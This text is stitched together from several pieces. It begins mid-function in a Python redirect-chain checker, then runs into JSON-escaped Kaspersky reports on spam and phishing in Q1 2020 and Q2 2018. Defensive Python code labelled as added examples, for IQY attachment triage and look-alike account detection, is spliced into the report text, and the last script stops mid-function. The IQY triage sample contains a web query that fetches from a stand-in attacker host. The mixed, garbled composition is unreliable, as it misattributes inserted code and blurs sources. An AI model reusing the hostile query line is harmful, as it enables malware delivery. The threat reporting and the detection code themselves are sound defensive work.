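    or a chain longer than `max_hops`; both are treated as suspicious on their own.
    """
    chain = [url]
    seen = {url}
    current = url
    for _ in range(max_hops):
        nxt = fetch_location(current)
        if nxt is None:
            return chain, current, False
        if nxt in seen:                      # redirect loop
            return chain + [nxt], nxt, True
        chain.append(nxt)
        seen.add(nxt)
        current = nxt
    return chain, current, True              # hop budget exhausted


def verdict(url, trusted_hosts):
    """Classify the landing host against an allow-list of hosts (exact or parent domain)."""
    chain, final, broken = expand(url)
    parts = urlparse(final)
    host = parts.hostname or ""
    if broken:
        return "suspicious: redirect loop or chain too long", chain
    trusted = any(host == t or host.endswith("." + t) for t in trusted_hosts)
    if not trusted:
        reason = "untrusted landing host"
        if parts.scheme != "https":
            reason += ", plain HTTP"
        return f"suspicious: {reason} ({host})", chain
    return f"ok: lands on {host}", chain


if __name__ == "__main__":
    for u in ("https://short.example/abc", "https://short.example/safe", "https://short.example/loop"):
        print(u, "->", verdict(u, ["example.org"]))
```

Only the redirect chain is examined here; the body of the final page is never fetched, so the check itself cannot trigger whatever the landing page serves.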
Interestingly, even if the user already had an SSN, they were still pestered to get another one.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203357/sl_spam_report_42.jpg>)\n\nAfter that, the potential victim was redirected to a payment page with the amount and currency based on the user's location. For instance, users in Russia were asked to pay in rubles.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203504/sl_spam_report_43.jpg>)\n\nThe scam deployed the conventional scheme (especially common in the Runet) of asking the victim to pay a small commission or down payment for the promise of something much bigger. In Q1, 14,725,643 attempts to redirect users to such websites were blocked.\n\n## Disaster and pandemic\n\n### Fires in Australia\n\nThe natural disaster that hit the Australian continent was another get-rich opportunity for scammers. For example, one \"Nigerian prince\"-style e-mail scam reported that a millionaire dying of cancer was ready to donate her money to save the Australian forests. The victim was asked to help withdraw the funds from the dying woman's account by paying a fee or making a small contribution to pay for the services of a lawyer, for which they would be rewarded handsomely at a later date.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203546/sl_spam_report_21.png>)\n\nBesides the fictional millionaire, other \"nature lovers\" were keen to help out \u2014 their e-mails were more concise, but the scheme was essentially the same.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203616/sl_spam_report_22.png>)\n\n### COVID-19\n\n#### \"Nigerian prince\" scheme\n\nCOVID-19 was (and continues to be) a boon to scammers: non-existent philanthropists and dying millionaires are popping up everywhere offering rewards for help to withdraw funds supposedly for humanitarian purposes. 
Some recipients were even invited to help finance the production of a miracle vaccine, or take part in a charity lottery, the proceeds of which, it was said, would be distributed to poor people affected by the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203723/sl_spam_report_23.png>)\n\n#### Bitcoin for coronavirus\n\nHaving introduced themselves as members of a healthcare organization, the scammers appealed to the victim to transfer a certain sum to the Bitcoin wallet specified in the message. The donation would allegedly go toward fighting the coronavirus outbreak and developing a vaccine, as well as helping victims of the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203816/sl_spam_report_24.png>)\n\nIn one e-mail, the attackers played on people's fear of contracting COVID-19: the message was from an unnamed \"neighbor\" claiming to be dying from the virus and threatening to infect the recipient unless the latter paid a ransom (which, it was said, would help provide a comfortable old age for the ransomer's parents).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203854/sl_spam_report_25.png>)\n\n#### Dangerous advice from the WHO\n\nOne fraudulent mailing disguised as a WHO newsletter offered tips about staying safe from COVID-19.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203939/sl_spam_report_26.png>)\n\nTo get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. 
Whereas in the first mailings only a username and password were asked for, in later ones a phone number was also requested.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204032/sl_spam_report_27.png>)\n\nIn addition, we detected several e-mails supposedly from the WHO containing documents with malware. The recipient was asked to open the attachment (in DOC or PDF format), which allegedly offered coronavirus prevention advice. For example, this message contained [Backdoor.Win32.Androm.tvmf](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204128/sl_spam_report_28.png>)\n\nThere were other, less elaborate mailings with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204203/sl_spam_report_29.png>)\n\n \n\n#### Corporate segment\n\nThe coronavirus topic was also exploited in attacks on the corporate sector. For example, COVID-19 was cited in fraudulent e-mails as a reason for delayed shipments or the need to reorder. The authors marked the e-mails as urgent and required to check attached files immediately.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204258/sl_spam_report_30.png>)\n\nAnother mailing prompted recipients to check whether their company was in a list of firms whose activities were suspended due to the pandemic. After which it asked for a form to be filled out, otherwise the company could be shut down. Both the list of companies and the form were allegedly in the archives attached to the message. 
In actual fact, the attachments contained [Trojan-PSW.MSIL.Agensla.a](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204343/sl_spam_report_31.png>)\n\nWe also registered a phishing attack on corporate users. On a fake page, visitors were invited to monitor the coronavirus situation across the world using a special resource, for which the username and password of the victim's corporate mail account were required.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204434/sl_spam_report_32.png>)\n\n#### Government compensation\n\nThe introduction of measures to counter the pandemic put many people in a difficult financial situation. Forced downtime in many industries has had a negative impact on financial well-being. In this climate, websites offering compensation from the government pose a particular danger.\n\nOne such popular scheme was [highlighted](<https://twitter.com/assolini/status/1242054069193183235>) by a colleague of ours from Brazil. WhatsApp messages about financial or food assistance were sent that appeared to come from a supermarket, bank, or government department. To receive the aid, the victim had to fill out the attached form and share the message with a certain number of contacts. 
After the form was filled out, the data was sent to the cybercriminals, while the victim got redirected to a page with advertising, a phishing site, a site offering a paid SMS subscription, or similar.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204543/sl_spam_report_34.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204614/sl_spam_report_35.png>)\n\nGiven that the number of fake sites offering government handouts seems likely only to increase, we urge caution when it comes to promises of compensation or material assistance.\n\n#### Anti-coronavirus protection with home delivery\n\nDue to the pandemic, demand for antiseptics and antiviral agents has spiked. We registered a large number of mailings with offers to buy antibacterial masks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204656/sl_spam_report_36.png>)\n\nIn Latin America, WhatsApp mass messages were used to invite people to take part in a prize draw for hand sanitizer products from the brewing company Ambev. The company has indeed started making antiseptics and hand gel, but exclusively for public hospitals, so the giveaway was evidently the work of fraudsters.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204722/sl_spam_report_37.png>)\n\nThe number of fake sites offering folk remedies for the treatment of coronavirus, drugs to strengthen the immune system, and non-contact thermometers and test kits has also risen sharply. Most of the products on offer have no kind of certification whatsoever.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204747/sl_spam_report_38.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204823/sl_spam_report_39.png>)\n\nOn average, the daily share of e-mails mentioning COVID-19 in Q1 amounted to around 6% of all junk traffic. 
More than 50% of coronavirus-related spam was in the English language. We anticipate that the number of phishing sites and pandemic-related scams will only increase, and that cybercriminals will use new attack schemes and strategies.\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212717/sl_spam_report_01-en-dolya-spama-v-mirovom-pochtovom-trafike-q4-2019-q1-2020-g.png>)_\n\nIn Q1 2020, the largest share of spam was recorded in January (55.76%). The average percentage of spam in global mail traffic was 54.61%, down 1.58 p.p. against the previous reporting period.\n\n_Proportion of spam in Runet mail traffic, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212802/sl_spam_report_02-en-dolya-spama-v-pochtovom-trafike-runeta-q4-2019-q1-2020-g.png>)_\n\nIn Q1, the share of spam in Runet traffic (the Russian segment of the Internet) likewise peaked in January (52.08%). At the same time, the average indicator, as in Q4 2019, remains slightly lower than the global average (by 3.20 p.p.).\n\n## Sources of spam by country\n\n \n\n_Sources of spam by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212844/sl_spam_report_03-en-strany-istochniki-spama-v-mire-pervyj-kvartal-2020-g.png>)_\n\nIn Q1 2020, Russia led the TOP 5 countries by amount of outgoing spam. It accounted for 20.74% of all junk traffic. In second place came the US (9.64%), followed by Germany (9.41%) just 0.23 p.p. behind. 
Fourth place goes to France (6.29%) and fifth to China (5.22%), which is usually a TOP 3 spam source.\n\nBrazil (3.56%) and the Netherlands (3.38%) took sixth and seventh positions, respectively, followed by Vietnam (2.55%), with Spain (2.34%) and Poland (2.21%) close on its heels in ninth and tenth.\n\n### Spam e-mail size\n\n \n\n_Spam e-mail size, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212928/sl_spam_report_04-en-razmery-spamovyh-pisem-vtoroj-i-tretij-kvartaly-2019-g.png>)_\n\nCompared to Q4 2019, the share of very small e-mails (up to 2 KB) in Q1 2020 fell by more than 6 p.p. and amounted to 59.90%. The proportion of e-mails sized 5-10 KB grew slightly (by 0.72 p.p.) against the previous quarter to 5.56%.\n\nMeanwhile, the share of 10-20 KB e-mails climbed by 3.32 p.p. to 6.36%. The number of large e-mails (100\u2013200 KB) also posted growth (+2.70 p.p.). Their slice in Q1 2020 was 4.50%.\n\n### Malicious attachments in e-mail\n\n \n\n_Number of Mail Anti-Virus triggerings, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213009/sl_spam_report_05-en-kolichestvo-srabatyvanij-pochtovogo-antivirusa-q4-2019-q1-2020-g.png>)_\n\nIn Q1 2020, our security solutions detected a total of 49,562,670 malicious e-mail attachments, which is almost identical to the figure for the last reporting period (there were just 314,862 more malicious attachments detected in Q4 2019).\n\n_TOP 10 malicious attachments in mail traffic, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213057/sl_spam_report_06-en-top-10-vredonosnyh-vlozhenij-v-pochtovom-trafike-pervyj-kvartal-2020-g.png>)_\n\nIn Q1, first place in terms of prevalence in mail traffic went to Trojan.Win32.Agentb.gen (12.35%), followed by Exploit.MSOffice.CVE-2017-11882.gen (7.94%) in second and Worm.Win32.WBVB.vam (4.19%) in third.\n\n_TOP 10 
malicious families in mail traffic, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213137/sl_spam_report_07-en-top-10-vredonosnyh-semejstv-v-pochtovom-trafike-pervyj-kvartal-2020.png>)_\n\nAs regards malware families, the most widespread this quarter was [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) (12.51%), with [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (7.98%), whose members exploit a vulnerability in Microsoft Equation Editor, in second place and [Worm.Win32.wbvb](<https://threats.kaspersky.com/en/threat/Worm.Win32.WBVB/>) (4.65%) in third.\n\n### Countries targeted by malicious mailshots\n\n \n\n_Distribution of Mail Anti-Virus triggerings by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213218/sl_spam_report_08-en-raspredelenie-srabatyvanij-pochtovogo-antivirusa-po-stranam-pervyj-kvartal-2020-g.png>)_\n\nFirst place by number of Mail Anti-Virus triggerings in Q1 2020 was claimed by Spain. This country accounted for 9.66% of all users of Kaspersky security solutions who encountered e-mail malware worldwide. Second place went to Germany (8.53%), and Russia (6.26%) took bronze.\n\n## Statistics: phishing\n\nIn Q1 2020, the Anti-Phishing system prevented **119,115,577** attempts to redirect users to scam websites. 
The percentage of unique attacked users was 8.80% of the total number of users of Kaspersky products in the world.\n\n### Attack geography\n\nThe country with the largest proportion of users attacked by phishers, not for the first time, was Venezuela (20.53%).\n\n_Geography of phishing attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213300/sl_spam_report_09-en-geografiya-fishingovyh-atak-pervyj-kvartal-2020-goda.png>)_\n\nIn second place, by a margin of 5.58 p.p., was Brazil (14.95%), another country that is no stranger to the TOP 3. Next came Australia (13.71%), trailing by just 1.24 p.p.\n\n**Country** | **%*** \n---|--- \nVenezuela | 20.53% \nBrazil | 14.95% \nAustralia | 13.71% \nPortugal | 12.98% \nAlgeria | 12.12% \nFrance | 11.71% \nHonduras | 11.62% \nGreece | 11.58% \nMyanmar | 11.54% \nTunisia | 11.53% \n \n_* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by the Anti-Phishing component of Kaspersky products. This component detects pages with phishing content that the user gets redirected to. It does not matter whether the redirect is the result of clicking a link in a phishing e-mail or in a message on a social network, or the result of malicious program activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThe largest share of phishing attacks in Q1 2020 fell to the Online Stores category (18.12%). 
Second place went to Global Internet Portals (16.44%), while Social Networks (13.07%) came in third.\n\n_Distribution of organizations affected by phishing attacks by category, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213351/sl_spam_report_10-en-raspredelenie-organizacij-chi-polzovateli-byli-atakovany-fisherami-po-kategoriyam-pervyj-kvartal-2020-g.png>)_\n\nAs for the Banks category, a TOP 3 veteran, this time it placed fourth with 10.95%.\n\n## Conclusion\n\nGlancing at the results of Q1 2020, we anticipate that the COVID-19 topic will continue to be actively used by cybercriminals for the foreseeable future. To attract potential victims, the pandemic will be mentioned even on \"standard\" fake pages and in spam mailings.\n\nThe topic is also used extensively in fraudulent schemes offering compensation and material assistance.\n\nIt is highly likely that this type of fraud will become more frequent.\n\nThe average share of spam in global mail traffic (54.61%) this quarter decreased by 1.58 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 120 million.\n\nTop of this quarter's list of spam-source countries is Russia, with a share of 20.74%. 
Our security solutions blocked 49,562,670 malicious mail attachments, while the most common mail-based malware family, with a 12.35% share of mail traffic, was Trojan.Win32.Agentb.gen.", "modified": "2020-05-26T10:00:50", "published": "2020-05-26T10:00:50", "id": "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "href": "https://securelist.com/spam-and-phishing-in-q1-2020/97091/", "type": "securelist", "title": "Spam and phishing in Q1 2020", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-14T10:31:27", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Quarterly highlights\n\n### GDPR as a phishing opportunity\n\nIn the first quarter, we discussed spam designed to exploit GDPR (General Data Protection Regulation), which came into effect on May 25, 2018. Back then spam traffic was limited to invitations to participate in workshops and other educational events and purchase software or databases. We predicted that fraudulent emails were soon to follow. And we found them in the second quarter.\n\nAs required by the regulation, companies notified email recipients that they were switching to a new GDPR-compliant policy and asked them to confirm permission to store and process personal information. This was what criminals took advantage of. To gain access to the personal information of well-known companies' customers, criminals sent out phishing emails referencing the GDPR and asking recipients to update their account information. To do this, customers had to click on the link provided and enter the requested data, which immediately fell into the hands of the criminals. 
It must be noted that the attackers were targeting customers of financial organizations and IT service providers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122429/180810-spam-report-q2-18-1.png>)\n\n_Phishing emails exploiting GDPR_\n\n### Malicious IQY attachments\n\nIn the second quarter, we uncovered several malspam incidents with never-before-seen IQY (Microsoft Excel Web Query) attachments. Attackers disguise these files as invoices, order forms, document copies, etc., which is a known ploy that is still actively used for malspamming. The From field contains addresses that look like personal emails, and attachment names follow a template: a base name, followed by either a date or a random number sequence.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122440/180810-spam-report-q2-18-2.png>)\n\n_Harmful .iqy files_\n\nWhen the victim opens the IQY file, the computer downloads several trojan-downloaders, which install the Flawed Ammyy RAT backdoor. The infection chain may look like this: Trojan-Downloader.MSExcel.Agent downloads another downloader from the same family, which, in turn, downloads Trojan-Downloader.PowerShell.Agent, then this trojan downloads Trojan-Downloader.Win32.Dapato, which finally installs the actual Backdoor.Win32.RA-based.hf (also known as Flawed Ammyy RAT) used to gain remote access to the victim's computer, steal files and personal information, and send spam.\n\nIt is rather difficult to detect these attachments because the files look like ordinary text documents that merely pass web-query parameters (above all, a URL to fetch) from a remote source into an Excel spreadsheet. 
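A mail-gateway triage routine for the IQY attachments described in this section, written as an added Python example; it is not Kaspersky's code, and the same attachment walk applies to the DOC, PDF and archive attachments from the COVID-19 mailings covered earlier on this page. The message, sender, attachment name and URL are all constructed placeholders. An IQY file is plain text: the first line names the query type (`WEB`), the second the format version, the third the URL Excel will request when the file is opened, followed by optional `key=value` lines. Because the file is so small, the useful indicators are the URL it carries and whether the attachment name follows the base-name-plus-digits template noted above.

```python
"""Triage an e-mail for IQY (Excel Web Query) attachments and extract the URL each
one would make Excel fetch when opened.

Added example, not Kaspersky's code. The sample message is constructed; its sender,
attachment name and URL are placeholders.
"""
import email
import re
from email import policy
from urllib.parse import urlparse

# Constructed sample: invoice-themed IQY attachment from a personal-looking address,
# named <word>_<date>.iqy as in the naming template described in the report.
SAMPLE_EML = b"""\
From: "Accounts" <jane.doe1987@example.net>
To: finance@example.com
Subject: Invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attached invoice.
--b1
Content-Type: application/octet-stream; name="invoice_20180610.iqy"
Content-Disposition: attachment; filename="invoice_20180610.iqy"
Content-Transfer-Encoding: 7bit

WEB
1
http://attacker-placeholder.example/invoice.dat

Selection=AllTables
Formatting=None
--b1--
"""

# Base name, optional separator, then a date or a run of digits, then .iqy.
NAME_TEMPLATE = re.compile(r"^[a-z]+[_-]?\d{4,}\.iqy$", re.IGNORECASE)


def parse_iqy(data: bytes):
    """Return {'url': ..., 'params': {...}} for a WEB query file, or None if it is not one."""
    lines = [ln.strip() for ln in data.decode("utf-8", "replace").splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    params = {}
    for ln in lines[3:]:                      # optional key=value lines after the URL
        if "=" in ln:
            key, _, value = ln.partition("=")
            params[key.strip()] = value.strip()
    return {"url": lines[2], "params": params}


def triage(raw: bytes):
    """List every IQY attachment with the indicators a gateway would log or alert on."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    sender = str(msg.get("From", ""))
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith(".iqy"):
            continue
        parsed = parse_iqy(part.get_payload(decode=True) or b"")
        url = parsed["url"] if parsed else ""
        target = urlparse(url)
        findings.append({
            "attachment": name,
            "sender": sender,
            "matches_template": bool(NAME_TEMPLATE.match(name)),
            "url": url,
            "host": target.hostname or "",
            "plain_http": target.scheme == "http",
            "params": parsed["params"] if parsed else {},
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EML):
        print(finding)
```

The extracted host is the value worth feeding into blocklists or reputation lookups; the file itself contains no code, so the URL is the whole story.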
IQY files can also be a very dangerous tool in the hands of criminals because their structure is no different from the structure of legitimate files, yet they can be used to download any data at all.\n\nIt must be noted that malspam with IQY attachments is distributed via the largest botnet called Necurs. As a reminder, this is the botnet responsible for malspam (ransomware, macro-viruses, etc.), as well as pump-and-dump and dating spam. The botnet's operation is characterized by periods of spiking and idling while infection and filter evasion mechanisms become ever more sophisticated.\n\n### Data leaks\n\nThe wave of confidential information leaks we discussed in the previous quarter is still on the rise. Here are some of the most notable events of the quarter:\n\n * Hacking and theft of personal information of 27M Ticketfly customers;\n * 92M MyHeritage genealogy service users' personal information was discovered on a public server;\n * 340M individual records were lost by Exactis, a marketing company;\n * An unprotected Amazon server allowed access to the personal information of 48M Facebook, LinkedIn, Twitter, and Zillow users.\n\nAs a result of such leaks, cybercriminals get a hold of users' names, email addresses, phone numbers, dates of birth, credit card numbers, and personal preferences. This information may later be used to launch targeted phishing attacks, which are the most dangerous type of phishing.\n\n### Cryptocurrency\n\nIn the second quarter, our antiphishing system prevented 58,000 user attempts to connect to phishing websites masquerading as popular cryptocurrency wallets and markets. In addition to classic phishing, which aims at gaining access to the victim's accounts and private key information, cybercriminals try every way to entice a victim to willingly send them cryptocurrency. One of the examples of this are cryptocoin giveaways. 
Cybercriminals continue using the names of new ICO projects to collect money from potential investors that are trying to gain early access to new tokens. Sometimes phishing sites pop up before official project sites.\n\nEthereum (ETH) is currently the most popular cryptocurrency with phishers. The popularity of Ethereum with cybercriminals increases as more funds are attracted by [ICOs on the Ethereum platform](<https://www.kaspersky.ru/blog/ethereum-ico/19025/>). According to our very rough estimate (based on data received from over a thousand ETH wallets used by malefactors), over the Q2 2018, cybercriminals exploiting ICOs [managed to make](<https://securelist.com/in-cryptoland-trust-can-be-costly/86367/>) $2,329,317 (end-of-July-2018 exchange rate), traditional phishing not included.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122449/180810-spam-report-q2-18-3.png>)\n\n_Fake ICO project pages: the first is located on fantom.pub and imitates fantom.foundation, the real site of the FANTOM project; the second one, found on sparkster.be, is an imitation of sparkster.me, the original SPARKSTER site_\n\n### World Cup 2018\n\nCybercriminals from all over the world prepared for the World Cup as much as its organizers and soccer fans. The World Cup was used in many traditional scamming methods using social engineering. Cybercriminals created fake championship partner websites to gain access to victims' bank and other accounts, carried out targeted attacks, and created [bogus fifa.com account sign-in pages](<https://securelist.ru/2018-fraud-world-cup/90108/>).\n\n### HTTPS\n\n[As mentioned in the 2017 report](<https://securelist.com/spam-and-phishing-in-2017/83833/#phishing-pages-migrate-to-https>), more and more phishing pages are now found on [certified](<https://encyclopedia.kaspersky.ru/glossary/digital-certificates/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) domains. 
Those may include hacked or specially registered domains that cybercriminals use to store their content. This has to do with the fact that most of the Internet is switching to HTTPS and it has become easy to get a simple certificate. In the middle of the second quarter, this prompted Google to [announce future efforts](<https://blog.chromium.org/2018/05/evolving-chromes-security-indicators.html>) aimed at changing the way Chrome works with certificates. Starting in September 2018, the browser (Chrome 69) will stop marking HTTPS sites as \"Secure\" in the URL bar. Instead, starting in October 2018, Chrome will start displaying the \"Not secure\" label when users enter data on unencrypted sites. \n\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10123710/180810-spam-report-q2-18-3-5.gif>)\n\n_When Chrome 70 comes out in October 2018, a red \"Not secure\" marker will be displayed for all HTTP sites where users enter data._\n\nGoogle believes that this will make more sites use encryption. After all, users should expect the web to be safe by default and receive warnings only in the event of any issues.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122456/180810-spam-report-q2-18-4.png>)\n\n_An example of a certified phishing website marked as \"Secure\"._\n\nAt the moment, the green Secure message in the URL bar is rather misleading for a user, especially when they visit a phishing website.\n\n### Vacation season\n\nIn anticipation of the vacation season, cybercriminals have used all of the possible topics that may interest travelers, [from airplane ticket purchases to hotel bookings](<https://www.kaspersky.com/blog/protect-your-vacation/22352>). For instance, we've found many websites that offer very tempting accommodations at absurd prices (e.g., an entire four-bedroom house in Prague with a pool and a fireplace at $1,000 a month). 
Such websites pose as Amazon, TripAdvisor, and other sites popular among travelers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122505/180810-spam-report-q2-18-5.png>)\n\n_An example of a fake hotel booking website_\n\nA similar method is used to fake ticket aggregator websites. In these cases, the displayed flight information is real, but the tickets turn out to be fake.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122513/180810-spam-report-q2-18-6.png>)\n\n_An example of fake airline ticket websites_\n\n## Distribution channels\n\nIn our reports, we regularly point out that phishing and other spam went beyond email a long time ago. Attackers use every means of communication at their disposal and even recruit unsuspecting users themselves for malware distribution. In this quarter, most large-scale attacks were found in messengers and on social networks.\n\n### WhatsApp\n\nCybercriminals have been using WhatsApp more frequently to distribute their content lately. WhatsApp users copy and resend spam messages themselves, just like they used to do with luck chain letters many years ago. Most of these messages contain information about fictional lotteries or giveaways (we have already discussed these types of scams many times). Last quarter, cybercriminals brought back the airplane ticket giveaways. This quarter in Russia, for instance, they used names of [popular retailers](<https://www.kaspersky.ru/blog/coupon-scam/20830>) such as Pyaterochka and Leroy Merlin, and also McDonald's. 
Some fake messages come from popular sportswear brands, as well as certain stores and coffee shops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122520/180810-spam-report-q2-18-6-5.jpg>)\n\n_Users share messages about ticket raffles with their contacts via a messenger since it's one of the conditions for winning_\n\nOnce a user has sent the message to some friends, he or she is redirected to another resource, the content of which changes depending on the victim's location and device. If the user visits the site from their smartphone, most often they are automatically subscribed to paid services. The user may also be redirected to a page containing a survey or a lottery or to some other malicious website. For instance, a user may be invited to install a browser extension which will later intercept the data they enter on other websites and use their name to do other things online, such as publish posts on social media.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122527/180810-spam-report-q2-18-7.png>)\n\n_An example of a page which a user is redirected to after a survey, at the end of which they were promised a coupon to be used in a popular retail chain. As you can see, no coupon has been received, but the user is invited to install a browser extension with suspicious permissions._\n\n### Twitter and Instagram\n\nCybercriminals have been using Twitter to distribute fraudulent content for a long time. However, it has recently become a breeding ground for fake celebrity and company accounts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122533/180810-spam-report-q2-18-8.png>)\n\n_Fake account for Pavel Durov_\n\nThe most popular cover used by cybercriminals is cryptocurrency giveaways on behalf of celebrities. The user is asked to transfer a small amount of cryptocurrency to a certain wallet to get double or triple coins back. 
To enhance trust, the wallet may be located on a separate website, which also contains a list of fake transactions that the victim can see "updating" in real time, apparently confirming that anyone who transfers money to the wallet gets back several times the amount sent. Of course, the victim receives nothing. Despite its simplicity, this scheme makes cybercriminals millions of dollars. This quarter, cybercriminals favoured the names of Elon Musk, Pavel Durov, and Vitalik Buterin. These names were not chosen at random: Elon Musk is an entrepreneur, inventor, and investor, while Durov and Buterin made the cryptocurrency market leader list [published by Fortune](<http://fortune.com/the-ledger-40-under-40>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122541/180810-spam-report-q2-18-9.png>)\n\n_An example of a website advertised on Elon Musk's fake account_\n\nNews sensations make these schemes even more effective. For instance, the attempt to block the Telegram messenger in Russia generated a wave of fake messages from "Pavel Durov" promising compensation. In such cases cybercriminals rely on account names that differ from the genuine one by a single detail. For example, if the original account name contains an underscore, cybercriminals register a new user with two underscores in the name and post messages about cryptocurrency giveaways in the replies to the celebrity's authentic tweets. As a result, even a detail-oriented person may have a hard time spotting the fake.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122549/180810-spam-report-q2-18-10.png>)\n\nTwitter's administration promised long ago to stop this type of fraud. One of its first steps was to block accounts that tried to change their display name to Elon Musk, and most probably to other names commonly used by cybercriminals as well. 
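The doubled-underscore trick described above defeats an exact-match check on account names, and a display-name block like Twitter's does nothing about it. As an added example (not code from the report), here is a brand-protection check that normalizes handles before comparing them: it collapses repeated separators, maps digit and symbol look-alikes to the letters they imitate, folds multi-character confusables such as "rn" for "m", and then scores near-misses with a similarity ratio. The protected handles and the candidate list are constructed for the example, and the confusables table is deliberately small.

```python
import difflib
import re
import unicodedata

# Single-character look-alikes seen in impersonation handles. Hypothetical,
# deliberately small table; production code would use Unicode's confusables.txt.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "i": "l", "|": "l", "3": "e", "4": "a",
    "5": "s", "7": "t", "8": "b", "$": "s", "@": "a",
})


def normalize_handle(handle: str) -> str:
    """Collapse the tricks that make two handles look alike to a human.

    - case and accents are dropped (NFKD, then combining marks removed)
    - digit/symbol look-alikes are mapped to the letter they imitate
    - 'rn' -> 'm' and 'vv' -> 'w' (multi-character confusables)
    - runs of separators are collapsed, so 'pavel_durov' and 'pavel__durov'
      (the doubled-underscore trick from the report) normalize to the same string
    """
    h = handle.lstrip("@").lower()
    h = unicodedata.normalize("NFKD", h)
    h = "".join(c for c in h if not unicodedata.combining(c))
    h = h.replace("rn", "m").replace("vv", "w")
    h = h.translate(CONFUSABLES)
    return re.sub(r"[_.\-]+", "_", h)


def lookalike_score(candidate: str, protected: str) -> float:
    """1.0 when the normalized forms are identical, otherwise a similarity ratio."""
    a, b = normalize_handle(candidate), normalize_handle(protected)
    if a == b:
        return 1.0
    return difflib.SequenceMatcher(None, a, b).ratio()


def find_impersonations(candidates, protected, threshold: float = 0.9):
    """Return (candidate, protected_handle, score) for every candidate that looks
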